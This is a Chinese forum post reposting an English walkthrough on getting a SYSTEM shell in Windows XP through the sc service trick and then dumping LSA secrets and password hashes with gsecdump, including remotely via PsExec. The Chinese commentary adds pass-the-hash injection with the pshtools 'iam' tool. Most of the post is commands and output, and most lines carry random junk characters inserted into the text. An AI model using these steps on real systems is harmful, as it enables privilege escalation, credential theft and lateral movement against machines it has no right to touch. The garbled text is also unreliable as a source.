o get a DOS Prompt as NT system:9 }# }/ D6 ` p* j
w( D1 v/ @) t0 z2 D9 y8 bC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact: G, K& i( s( Y0 ~- D
[SC] CreateService SUCCESS8 e3 e( G4 o0 r7 N0 Q4 p
6 Y0 K4 K- G9 W+ v5 H8 L
C:\>sc start shellcmdline" Y( u7 I% I8 v- l( u
[SC] StartService FAILED 1053:
% ]4 \9 v3 L1 i5 T9 n1 G8 m
1 I. X% h, n, |) P; _( |9 F! @The service did not respond to the start or control request in a timely fashion.
( x( d& T0 L7 j6 c3 j& W) s
& O# J) W' K0 v- f7 P( LC:\>sc delete shellcmdline2 l G+ d7 U4 s
[SC] DeleteService SUCCESS
" N" W4 C6 d, R1 o2 y
1 y9 S( B$ W# C, L------------! `+ W& c0 o: ?) c
. k: e4 U7 J; o( c
Then in the new DOS window:
/ \. m# I5 L( _" K. I2 b0 z! |% { ^; I4 k: c. H. _& D
Microsoft Windows XP [Version 5.1.2600]
, g( P' I' p3 ~4 D. ]2 n(C) Copyright 1985-2001 Microsoft Corp.
" m! _0 [! `8 O! D6 p9 s; d2 q6 t- E) X! |& ?& f
C:\WINDOWS\system32>whoami
$ Q, J5 J. M' RNT AUTHORITY\SYSTEM
6 }; u1 S2 o8 G) K' {4 C: \+ Y
( s' ~" X! ~% f: RC:\WINDOWS\system32>gsecdump -h7 `) e* e7 O3 b g- g( T8 N
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)8 q, w! V+ D$ T' r- j7 @9 l6 w
usage: gsecdump [options]
$ `8 x6 ]; |. u( R; N; m
) T+ V: Z& e$ r5 {options:
! G0 C5 F$ q. W, i; d6 E2 j) E* x-h [ --help ] show help
( @/ @3 I& z( ^; Y8 [# l$ y-a [ --dump_all ] dump all secrets1 I- J7 w. s0 \; ]' H! S
-l [ --dump_lsa ] dump lsa secrets
' ]+ @) C2 j. b" u0 R-w [ --dump_wireless ] dump microsoft wireless connections" v; B/ [4 C% I3 L {3 l4 g* s
-u [ --dump_usedhashes ] dump hashes from active logon sessions
& M$ X; T4 G' b- o-s [ --dump_hashes ] dump hashes from SAM/AD" V: H8 A$ Z$ a/ K7 V8 m
" {( K! n4 l+ S+ k* K( H$ vAlthough I like to use:
4 {0 `( T% _0 q/ x- e# F% g, U) f1 R5 K" m
PsExec v1.83 - Execute processes remotely
2 X. R3 b. c2 S) E% z/ lCopyright (C) 2001-2007 Mark Russinovich; \/ t J- {* w$ U
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
) ~& |: L) j; E- Y: J; T6 }0 ^- t. {9 u' W- i) t
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT1 f. `# c: a6 M* Y# p+ V9 A
# L* Z: J9 N3 \' n' C
to get the hashes from active logon sessions of a remote system.4 }/ K# U. s% B* Z
* R; ~, v6 w( Y$ |5 \These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables., _, D) R2 O$ G! j& Y
+ A; y& m9 w' X' U9 [" t+ e
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
; g0 ?$ I" \. l& v原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]! H2 q u5 I9 y1 a1 d
% M2 V `6 q0 E) n) R9 r2 I- [
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。. Z# j8 ]' G/ F# q: H- |% c
|
发表于 2012-11-6 21:09:29
收藏
支持
反对